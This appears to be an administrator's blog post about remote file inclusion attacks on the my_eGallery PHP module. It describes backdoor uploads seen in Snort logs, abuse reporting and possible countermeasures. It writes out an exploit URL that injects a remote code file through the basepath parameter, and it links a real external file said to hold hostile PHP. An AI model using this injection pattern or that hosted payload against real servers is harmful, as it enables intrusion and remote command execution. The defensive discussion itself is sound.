Attempts To Exploit My_ eGallery Vulnerability Target Random Sites

The gist of the problem is that there's a problem with my_ egallery that means a user can craft a link such as:

http://www.example.com/modules/my_ egallery/public/displayCategory.php?basepath=http://www.example.com/bleh/somefile.txt

and this will execute any code that's found in http://www.example.com/bleh/somefile.txt.

The attackers have been trying to execute php code - which varies in nature but mostly always includes code to identify the system and then upload some kind of backdoor server onto my server. The server would then be started so that the attackers can essentially get a shell with the privileges of the web server - www here.

The attempts to attack the hole showed up in snort as variations on the following:



I've stripped out a couple of lines, but the main gist is there. If you look at the file:

http://www.oakes.de/ry/lila.jpg

you can see the file isn't actually a jpeg file at all, but instead a file containing PHP code used to execute various probing actions on a target. Hopefully by the time anyone reads this, the previous link will have been taken down - if so the code looks like this:



Once this code is included, the attacker then just needs to set the $cmd variable and tack it onto the end of the URL to execute the commands on the web server.

There are actually other variations on this theme, some of which are quite impressive and even build a backdoor server in C and then compile/build/install the server and finally execute it. Cha0s data server or some such iirc. If I stumble across any examples I'll post the code here, it's really quite impressive. Just annoying that one person with (half a gimp node) brain writes the code and a half a million other script kiddies come along after and use the code to cause havoc.

Well anyway, if anyone has any ideas how to stop these idiots it'd be good to hear about it. Already I've sent out about a dozen or so abuse reports to webmasters on the servers hosting the dodgy files, and perhaps 5 or 6 have actually acted to stop the problem. I don't htink I'll bother reporting it much more because it takes such a long time to do (lookup details for the site, find abuse address, etc), even if you use a template abuse report mail and just fill in the blanks.

As I wrote in another article I was thinking about using mod_rewrite to redirect the attacks to somewhere else, that somewhere else maybe another script to report the attacks. This could be overkill though - at the end of the day the attacks are hardly impacting on me and mine but still, it's just the fact that bandwidth is being wasted!!!